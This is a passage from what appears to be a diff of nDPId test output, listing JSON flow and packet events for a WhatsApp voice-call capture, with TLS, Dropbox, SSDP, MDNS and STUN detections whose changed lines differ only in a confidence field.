{"version":"TLSv1.2","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455689909,"flow_last_seen":1561455690058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455690058,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455689909,"flow_last_seen":1561455690039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455690039,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455689909,"flow_last_seen":1561455690058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455690058,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00902{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1561455701309,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1561455701309,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxXcMAAEARlWjAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1561455701310,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1561455701310,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFvHu4AAEAR1D\/AqAIBwKgC\/0RcRFwBW7HJeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsxMTgyMzk1NTczLCAxNDIxMTE0Mzk5LCAxODA4MDQ3NjgwLCAxMzcyMDkyNjA5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNTI1ODAwNzEyMCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNDUxNDcyNjU4LCA0MTc0NjUwODgwLCAyODUyMTYwNywgMTQxNTYyMDM1MF19"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455702980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455702980,"pkt":"kLkxKPrKxiwDYGpkCABFAgBT1H4AAC8Gs3ARqy9VwKgCDAG7xUbop23K2+r6qYAYAEJmGwAAAQEICipMBbM0zcKkFQMDABo0yWx0nf4Y8Lruj7Xpo7KOiHQ6o5fprSXAlA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1561455702981,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455702981,"pkt":"kLkxKPrKxiwDYGpkCABFAAA01H8AAC8Gs5ARqy9VwKgCDAG7xUbop23p2+r6qYARAEJXLQAAAQEICipMBbM0zcKk"} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1561455703144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455703144,"pkt":"xiwDYGpkkLkxKPrKCABFAgBTAABAAEAGNu\/AqAIMEasvVcVGAbvb6vqp6KdtyoAYBACmYwAAAQEICjTOOFoqS5CDFQMDABoAAAAAAAAAAyfFNdvhqDfXGuNhDL9lpNkkKA=="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1561455704556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455704556,"pkt":"AQBef\/\/62DBiVgAcCABFAACa1ogAAP8Rp9yp\/qL07\/\/\/+sTQB2wAhsguTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704557,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1561455704557,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455704557,"pkt":"AQBef\/\/6xiwDYGpkCABFAACadbUAAAERkPrAqAIB7\/\/\/+sTQB2wAhlJ4TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704557,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704557,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1561455705874,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1561455705874,"pkt":"AQBeAAD7kLkxKPrKCABFAABNhSMAAP8RkszAqAIM4AAA+xTpFOkAOcRFAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAyAAQhfYWlycGxhecASAAyAAQ=="} -00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1561455705874,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1561455705874,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5+sIAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"} -00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1561455706881,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1561455706881,"pkt":"AQBeAAD7kLkxKPrKCABFAABNdOIAAP8Row3AqAIM4AAA+xTpFOkAOUTGAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAwAAQhfYWlycGxhecASAAwAAQ=="} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1561455706881,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1561455706881,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5e0MAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADAABCF9haXJwbGF5wBIADAAB"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1561455706912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACav+gAAEARgnnAqAIMHw1WMNwIDZYAhhEmAAMAaiESpEKmZ0918K0sABMVszZAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1561455706912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACaKEAAAEARGiLAqAIMHw1WMNwIDZYAhhElAAMAaiESpEKmZ0918K0sABMVszdAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 